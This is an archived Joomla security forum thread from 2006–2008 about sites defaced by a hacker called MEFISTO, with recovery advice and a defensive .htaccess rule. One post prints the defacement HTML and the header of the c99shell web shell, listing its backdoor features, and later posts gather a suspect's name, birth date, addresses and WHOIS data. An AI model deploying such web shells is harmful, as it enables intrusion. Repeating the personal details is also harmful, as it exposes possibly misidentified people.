Hacked by MEFISTO

Discussion regarding Joomla! security issues.

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
User avatar
jproducer
Joomla! Intern
Joomla! Intern
Posts: 67
Joined: Mon Sep 26, 2005 4:37 am
Location: Denver
Contact:

Hacked by MEFISTO

Post by jproducer » Wed Jul 26, 2006 4:46 am

Well, looks like I stepped away from my site for about a month and got hacked. I guess I'm posting because I'm hoping if someone looks at the page they can see the errors and maybe give a little hand.

I can't give much info, but can investigate. I had joomla 1.0.9 and had several components. I am not a master joomla user like some of the other threads I read about this. I'm just posting hoping it might get some questions that I can try and investigate and answer.

Here's my site, just happened in the last couple of days. I haven't checked in about a week.

http://www.prettymess.net/main/

Man, I really put a lot of work into this site and it was just about my recording studio. I guess I was naive to believe that I was not going to be targeted by someone with too much time on their hands. My mistake.

(I'm sure you can probably sense the defeat in my post, this really bums me out)
If you heard that...you should be the engineer!
http://www.prettymess.net

User avatar
infograf768
Joomla! Master
Joomla! Master
Posts: 19133
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Re: Hacked by MEFISTO

Post by infograf768 » Wed Jul 26, 2006 5:48 am

1. Please list all 3pd add-ons used on your site.
2. Look at the logs and search for the string "mosconfig", you will cerainly pinpoint there the target of the hacker.

Normally, your database should be safe. It will therefore be just a matter of reinstalling Joomla  (1.0.10 this time) and the right add-ons (updated to the new non-vulnerable versions obviously).
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

User avatar
jproducer
Joomla! Intern
Joomla! Intern
Posts: 67
Joined: Mon Sep 26, 2005 4:37 am
Location: Denver
Contact:

Re: Hacked by MEFISTO

Post by jproducer » Thu Jul 27, 2006 2:37 pm

Ext Cal, Joombook, and joomlaxplorer, I believe.

I do recall a little trouble with my ext cal first.
If you heard that...you should be the engineer!
http://www.prettymess.net

User avatar
crash777
Joomla! Explorer
Joomla! Explorer
Posts: 334
Joined: Sat Sep 03, 2005 1:56 am
Location: Upstate New York

Re: Hacked by MEFISTO

Post by crash777 » Thu Jul 27, 2006 4:20 pm

infograf768 wrote: 1. Please list all 3pd add-ons used on your site.
2. Look at the logs and search for the string "mosconfig", you will cerainly pinpoint there the target of the hacker.

Normally, your database should be safe. It will therefore be just a matter of reinstalling Joomla  (1.0.10 this time) and the right add-ons (updated to the new non-vulnerable versions obviously).
Not just reinstalling though.. make sure to REMOVE everything first.. or go through each directory and clean it.. I had at least a hundred malicious script files interspersed in my joomla folders AND the htaccess files were all hacked too..
Thanks!
Aaron

User avatar
infograf768
Joomla! Master
Joomla! Master
Posts: 19133
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Re: Hacked by MEFISTO

Post by infograf768 » Thu Jul 27, 2006 4:31 pm

crash777 wrote:
infograf768 wrote: 1. Please list all 3pd add-ons used on your site.
2. Look at the logs and search for the string "mosconfig", you will cerainly pinpoint there the target of the hacker.

Normally, your database should be safe. It will therefore be just a matter of reinstalling Joomla  (1.0.10 this time) and the right add-ons (updated to the new non-vulnerable versions obviously).
Not just reinstalling though.. make sure to REMOVE everything first.. or go through each directory and clean it.. I had at least a hundred malicious script files interspersed in my joomla folders AND the htaccess files were all hacked too..
Right.  ;)
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

Asphyx
Joomla! Hero
Joomla! Hero
Posts: 2454
Joined: Sun Aug 28, 2005 5:03 pm

Re: Hacked by MEFISTO

Post by Asphyx » Thu Jul 27, 2006 4:58 pm

I believe there is an update for extcal available (forget where I read that...)

User avatar
Elpie
Joomla! Guru
Joomla! Guru
Posts: 903
Joined: Wed Aug 17, 2005 11:26 pm
Contact:

Re: Hacked by MEFISTO

Post by Elpie » Fri Jul 28, 2006 1:28 am

That announcement about the security update for ExtCalendar and links to download are here: http://forum.joomla.org/index.php/topic ... #msg402249

@jproducer - check your files via ftp to see the dates on which they were changed. Since you have been away it should be easy to spot files that were created or modified in the period you weren't doing any work on the site. In most cases, these crackers have not touched the database - a quick check through using phpMyAdmin or whatever you use for database management will tell you if your data has been compromised.  If its ok, the best thing to do would be to backup your database, backup your template folder to your PC (and check files carefully for any changes), then delete all files and do a clean install of Joomla 1.0.10.  If your template is fine its then just a matter of adding that back in and importing your database.

Before adding back any extensions, check the 3PD security forum to make sure you dont install something known to be insecure.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info

User avatar
jproducer
Joomla! Intern
Joomla! Intern
Posts: 67
Joined: Mon Sep 26, 2005 4:37 am
Location: Denver
Contact:

Re: Hacked by MEFISTO

Post by jproducer » Fri Jul 28, 2006 3:38 am

Okay, my web provider has blocked my site and given me just ftp access. Now, they said that my mysql database wasn't wrecked. Is it possible to back up my database, install joomla fresh, then put back the database to save what I had?

I know this is a newbie question, but is it possible?
If you heard that...you should be the engineer!
http://www.prettymess.net

User avatar
brad
Joomla! Master
Joomla! Master
Posts: 13272
Joined: Fri Aug 12, 2005 12:38 am
Location: Australia
Contact:

Re: Hacked by MEFISTO

Post by brad » Fri Jul 28, 2006 3:40 am

jproducer wrote: Okay, my web provider has blocked my site and given me just ftp access. Now, they said that my mysql database wasn't wrecked. Is it possible to back up my database, install joomla fresh, then put back the database to save what I had?

I know this is a newbie question, but is it possible?
Yip. Just remove and replace your Joomla files. You will loose any non-core components/modules etc etc though. You might want to ensure you know how to configure your configuration.php file though... once new files are in place, setup configuration.php to connect to database and you should be good to go.

lnieves
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Sat Jul 29, 2006 2:33 pm

Re: Hacked by MEFISTO

Post by lnieves » Sat Jul 29, 2006 5:58 pm

I'm another victim of this pirate called MEFISTO. My website was "defaced" using the c99shell script. The attack apparently is related to com_securityimages component.

During the minutes prior to my web site being highjacked by this [EDit by mod: watch your language. Using such terms will not help solve your problems] I found multiples requests of the form

Mod Edit: Please don't paste log files to the forums.  Thank you. -RobS

To my surprise, this URL gives access to perform all kind of operations on the filesystem. MEFISTO then proceeded to overwriting the "configuration.php" with a simple HTML page.

I have now the following in my .htaccess for protection:
RewriteCond %{QUERY_STRING} .*mosConfig_absolute_path.*
RewriteRule .* - [F,L]
which will give a HTTP 403 error on any subsequent attempt to exploit the bug. This is admitedly not a permanent solution.
Last edited by infograf768 on Sun Jul 30, 2006 5:41 am, edited 1 time in total.

User avatar
Autoit
Joomla! Intern
Joomla! Intern
Posts: 59
Joined: Sun Apr 09, 2006 4:01 pm
Contact:

Re: Hacked by MEFISTO

Post by Autoit » Mon Aug 07, 2006 5:45 pm

my site:

/index.php:

Code: Select all

<html>
<head>
<meta http-equiv="Content-Language" content="tr">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>HaCKed By MEFISTO</title>
</head>

<body bgcolor="#000000" text="#808080">

<p align="center"> </p>
<p align="center"> </p>
<p align="center">
<img src="http://img301.imageshack.us/img301/6885/takeittuxlo5.jpg" 

width="200" height="300"></p>
<p align="center"> </p>

<p align="center"><font size="6"> HACKED By MEFISTO </font></p>
<p align="center"><font size="5">it's Not Hack..it's ******** BabE </font></p>
<p align="center"><font size="5">[email protected]</font></p>
<p align="center"><font size="5">ThanKs All My Friends..</font></p>
<p align="center"><font size="5">HACKED</font></p>

i find:

"/" added c99.php
"/components/com_jd-wiki/lib/tpl/default/" added .thumbs.php


in .thumbs.php:

Code: Select all

<?php
/*
******************************************************************************************************
*
*					c99shell.php v.1.0 pre-release build #16
*							Freeware license.
*								 [removed].
*  c99shell - r-ellcld ldl www-dld.
*  u eclnl lndrn nerrn dnltt ldnct r errl nndrcel ddenr:
   http://[removed].ru/releases/c99shell
*
*  WEB: http://[removed].ru
*  ICQ UIN #: 656555
*
*  nlnnc:
*  + ddrlcl eruec c rluec (ftp, samba) rrec/drderec, ndncder
*    rercrcl nercrcl r c drde
*    (ddldcnl dreurlnn?/drndreurlnn? ldl tar)
*    ddcnu dcne (ecl ndc r)
*    modify-time c access-time  r l el?tnn? ddc dlrencdrcc (? ne. ne $filestealth)
*  + udlcl ddca PHP-er
*  + ecduce ruo ldl md5, unix-md5, sha1, crc32, base64
*  + unndu eru rrc ldrnnnc N
*  + unndl ftp-nercdrcl r n?ec login;login c /etc/passwd (u rln nnd e 1/100 reern)
*    dnndrcu u, ndncder, adddul dldrcc r /nrcrec, ddrlcl ddlnnrec SQL)
*  + nedcdn "tcn" include: rnernclnec culn dldlelul n lnedcdndrec c nnr?ln co  nnuec (dcr)
     nrecl ec celcn $surl (rr? nnuer) ere ldl ecadrct (ddccnl) nre c ldl cookie "c99sh_surl",
     cln rn-rdcn rlc? $set_surl  cookie "set_surl"
*  + ecnn "rccn" /bin/bash r ddlllu ddn n ddcue drdle,
*    cc nlrn back connect (ddccnn? nlnncdrcl nlllc?, c u?nn? drdrelndu ? rdner NetCat).
*  + ecnn unnda nre-rlc? nedcdnr
*  + rnernccdrr? nddrer nulc  ldrnero c dclrc?o rnd (ldl mail())
.
.
.
.
in c99.php:

Code: Select all

*					c99shell.php v.1.0 beta
my site log in Attach:
[removed by moderator=--NEVER post vulneratble logs!]
Last edited by nathandiehl on Mon Aug 07, 2006 6:08 pm, edited 1 time in total.
### Joomla! AutoIt! ###
Joomla! 中文交流平台  [Chinese GMT +8] http://www.autoit.cn

friesengeist
Joomla! Guru
Joomla! Guru
Posts: 842
Joined: Sat Sep 10, 2005 10:31 pm

Re: Hacked by MEFISTO

Post by friesengeist » Mon Aug 07, 2006 7:12 pm

We may not be able to control the wind, but we can always adjust our sails

User avatar
Predator
Joomla! Ace
Joomla! Ace
Posts: 1823
Joined: Wed Aug 17, 2005 10:12 pm
Location: Germany-Bad Abbach
Contact:

Re: Hacked by MEFISTO

Post by Predator » Mon Aug 07, 2006 7:14 pm

There is no need to install the new version completly only unzip and replace the templates default and nucleus in /componets/com_jd-wiki/lib/tpl thats it if you only want to update.

If you have Register Global Off you are secure but to be sure also update the templates, the Remote Include Vulnerablility works only with RG = On.
Last edited by Predator on Mon Aug 07, 2006 7:24 pm, edited 1 time in total.
The "Humor, Fun and Games" forum has  more than 2500 Posts, so why not build a "Humor, Fun and Games Working" Group?
.....
Malicious tongues say we have this WG right from the start, they call it core team :D

User avatar
Autoit
Joomla! Intern
Joomla! Intern
Posts: 59
Joined: Sun Apr 09, 2006 4:01 pm
Contact:

Re: Hacked by MEFISTO

Post by Autoit » Mon Aug 07, 2006 7:21 pm

;) thank all!
### Joomla! AutoIt! ###
Joomla! 中文交流平台  [Chinese GMT +8] http://www.autoit.cn

User avatar
batje
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Sun Sep 04, 2005 7:43 am
Location: Kampala, Uganda
Contact:

Re: Hacked by MEFISTO

Post by batje » Mon Aug 14, 2006 2:40 pm

Just a bit of googling:

[email protected] brings you a lot of sites that have been hacked by this ingenious fellow. But no info. Although there is a lot of Turkish around these pages, somehow...

Doing a search for mefistofales brings up more interesting stuff, amonst wich 3 profiles, one in chech, one in romania and this one, in turkish:

http://www.blogcu.com/mefistofales

how many people would use this nickname and speak turkish?

There is an email address: [email protected] And a profile page:

http://www.blogcu.com/mefistofales/profile/

with this info:

Blog: ve ve ve
her şeyi bulabileceğiniz bir yer olma umuduyla

• Ad Soyad: selcuk yardimciel
• Cinsiyet: Erkek
• Doğum Tarihi: Kasım 12, 1983 (Yaş: 22)
• Yer: ankara, Turkiye
• Blog Kategorisi: Diğer

Yazdığım Yazılar: 0 kayıt
Yazdığım Yorumlar: 0 yorum
Alınan Yorumlar: 0 yorum
Kayıt Tarihi: 10 Mayıs 2006
Son Giriş: 19 Mayıs 2006

Is there anyone who reads turkish? For example, what does Diger stand for?

The attack on my server, was performed using a script hosted under a yahoo account called sikat_pl. You can see the code here: http://geocities.com/sikat_pl/nenen.txt
Sikat btw seems to be a philipino word if you google for it.

The IP adress from where the attack was staged was 125.160.81.175. I cant trace that address, even with http://www.ripe.net, my ISP does not allow me to do traceroutes either.

The second hacker btw was [email protected], and he also seems to master the turkish language. I think he just started, because google does not reveal a lot of information about this fellow.

Do other people have similar logs?

BTW, this post blocked the attack: http://forum.joomla.org/index.php/topic,75376.0.html

I just went into the backend of my website. I have a statistics component running. and guess what? It shows the last visitor! And guess what? He is from Turkey! And guess what? He has an ADSL modem. It's happily located at

dsl.static8510111679.ttnet.net.tr

If you were also hacked by this Mefisto guy, you can send an email to his provider at [email protected], asking for the guys name and address so that you can file a lawsuit against him. Given the fact that he seems to be relatively active, and Turkey really wants to show it is ready to join the EU, is expect they will answer positively to this request.
Last edited by batje on Mon Aug 14, 2006 3:03 pm, edited 1 time in total.
OpenSource from Africa
http://www.mountbatten.net

User avatar
chilifrei64
Joomla! Apprentice
Joomla! Apprentice
Posts: 31
Joined: Thu Feb 16, 2006 9:40 pm
Location: Detroit, MI

Re: Hacked by MEFISTO

Post by chilifrei64 » Tue Aug 15, 2006 12:00 pm

Yeah, there has to be some sort of security hole in joomla. I am on the latest 1.0.10 and 3 of my sites were hit.

Only the index.php was rewritten on each site(atleast all I could find)

Might be something to look into. I have not been able to find any c99.php script.. Only components are

joomlaxplorer(latest version)
my comment(this was installed the day it was hacked(latest version)
community builder(updated a week ago after the new security release)

Hope this helps you figure it out.

Johnny911
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Mon Sep 10, 2007 2:11 pm

Re: Hacked by MEFISTO

Post by Johnny911 » Mon Sep 10, 2007 2:17 pm

Whoever this Mefisto is, he's nothing but a low-life hacker wannabe, any real hacker with any shred of dignity wouldn't stoop to something as low as trashing your website..
Find your dryer parts the easy way...

Nibblers
Joomla! Apprentice
Joomla! Apprentice
Posts: 43
Joined: Thu Nov 23, 2006 7:52 pm

Re: Hacked by MEFISTO

Post by Nibblers » Mon Sep 10, 2007 3:35 pm

There are the details of this hackers website: http://WWW.ROOTHACKER.ORG and

His e-mail is: [email protected]

Domain ID: D122651965-LROR
Domain Name: ROOTHACKER.ORG
Created On: 18-May-2006 21:19:50 UTC
Last Updated On: 21-Aug-2007 21:57:20 UTC
Expiration Date: 18-May-2008 21:19:50 UTC
Sponsoring Registrar: Directi Internet Solutions d/b/a PublicDomainRegistry.Com
(R27-LROR)
Status:OK
Registrant ID: DI_4725324
Registrant Name: Neo Anderson
Registrant Organization: A.S
Registrant Street1: Kadikoy iskele caddesi no:12
Registrant Street2:
Registrant Street3:
Registrant City: kadikoy
Registrant State/Province: Istanbul
Registrant Postal Code: 06000
Registrant Country: TR
Registrant Phone: +212.5555555

The same info for Admin and Technical contact.

His name is probably false [ref: Matrix] , but you never know. The address seems a legit personal home address.

The IP for these nameservers is: 80.93.221.97

The name servers are:
ROOT.ROOTHACKER.ORG
DAMAR.ROOTHACKER.ORG

Address DN                      Type    Value
97.221.93.80.in-addr.arpa  name    host-80-93-221-97.teklan.com.tr 

He has had 22 unique nameserver changes for this domain within the last year.


Other domian associations: hackturkiye.net as well as hackyurkiya.com


As his website contains illegal material, his illegal activity is atrributable with a Google search and he seems to be hosting the site at home I'd complain to Domain Name Regsitrar of .org domains and complain to the registering agent: Directi Internet Solutions, who are based in the USA, requesting deletion of the domain name.
Last edited by Nibblers on Mon Sep 10, 2007 3:54 pm, edited 1 time in total.

Nibblers
Joomla! Apprentice
Joomla! Apprentice
Posts: 43
Joined: Thu Nov 23, 2006 7:52 pm

Re: Hacked by MEFISTO

Post by Nibblers » Thu Aug 28, 2008 12:17 pm

Some news - this person was behind the organisation many joomla hackers came from including MEFISTO...

http://thebellwetherdaily.[URL banned].com/ ... acker.html

Sunday, March 02, 2008
FBI Probing Ohio-based Computer Hacker: European Webhost Targeted From Cincinnati Surburb?

CINCINNATI (TDB) -- The FBI's computer crimes squad is on the trail of an Ohio hacker suspected of defacing Internet sites that use a company in Finland, Scene Group Oy, as their webhost. One of the targeted 'net sites reportedly was BahiaNetStore.com, which markets Brazilian-themed women's apparel. A federal magistrate authorized a search warrant last week for a Butler County home near Cincinnati where the hacker may have operated under the online screen name, or hacker tag, "Evilthoutz." No charges have been filed.

Scene Group is a private firm based in Pori, a city of more than 100,000 residents that is the 10th largest in Finland. A company official, Mikko Kivinen, is identified in a federal court affidavit obtained by The Daily Bellwether as first reporting the hacking incidents last November 28. Kivinen later traced the suspected hacker to an online bulletin board and a page on MySpace. Kivinen told the FBI his company was a target:

"Kivinen also stated that Evilthoutz was successful in hacking into the company's server and forwarding several e-mails to the e-mail address *****. During the hack, Evilthoutz tried to change the root password of the server and was unsuccessful. Evilthoutz then called the company hosting the servers, located in Texas, in an attempt to socially engineer the root password. Again, Evilthoutz was unsuccessful in changing the root password. Kivinen noted that the last website defacement occurred on December 27, 2007. Kivinen had no idea why Evilthoutz targeted his company."

The FBI said a confidential informant has contacted the suspected hacker online and discussed website defacements. Other records about Evilthoutz were subpoenaed from Microsoft and Cincinnati Bell, which operates a highspeed Internet service called Zoomtown.


Locked

Return to “Security - 1.0.x”